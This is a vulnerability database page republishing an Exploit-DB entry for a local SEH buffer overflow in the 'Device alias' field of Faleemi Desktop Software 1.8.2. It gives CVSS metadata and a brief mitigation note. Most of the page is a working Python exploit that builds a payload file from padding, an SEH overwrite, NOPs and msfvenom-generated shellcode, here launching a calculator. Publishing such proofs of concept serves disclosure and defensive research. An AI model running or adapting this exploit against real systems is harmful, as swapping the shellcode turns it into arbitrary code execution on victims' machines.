Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)

vendor:

Faleemi Desktop Software

by:

Gionathan 'John' Reale

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Faleemi Desktop Software

Affected Version From: 1.8.2

Affected Version To: 1.8.2

Patch Exists: YES

Related CWE: N/A

CPE: a:faleemi:faleemi_desktop_software:1.8.2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 32bit

2018

Faleemi Desktop Software 1.8.2 – ‘Device alias’ Local Buffer Overflow (SEH)

A buffer overflow vulnerability exists in Faleemi Desktop Software 1.8.2 when a long string is entered into the 'Device alias' field. An attacker can exploit this vulnerability by running a python exploit script which will create a new file with the name 'exploit.txt' containing the malicious payload. The attacker then needs to copy the content of 'exploit.txt' and paste it into the 'Device alias' field and click on 'Search'. This will result in a calculator pop-up.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-25
# Software Link: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe
# Tested Version: 1.8.2
# Tested on OS: Windows 7 32bit
# Steps to Reproduce: 
# Run the python exploit script, it will create a new file with the name 
# "exploit.txt" just copy the text inside "exploit.txt" and start the program and click on "Managing Log".
# In the "Device alias" field paste the content of "exploit.txt" and click on "Search". 
# You will see a calculator poped up.
 
#!/usr/bin/python
   
buffer = "A" * 219

NSEH = "\xeb\x06\x90\x90"

SEH = "\x3a\x7a\x04\x60"
nops = "\x90" * 8
#badchar \x00\x0a\x0d\x2f
#msfvenom calculator
buf =  ""
buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
pad = "B" * (5100 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )

payload = buffer + NSEH + SEH + nops + buf + pad
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"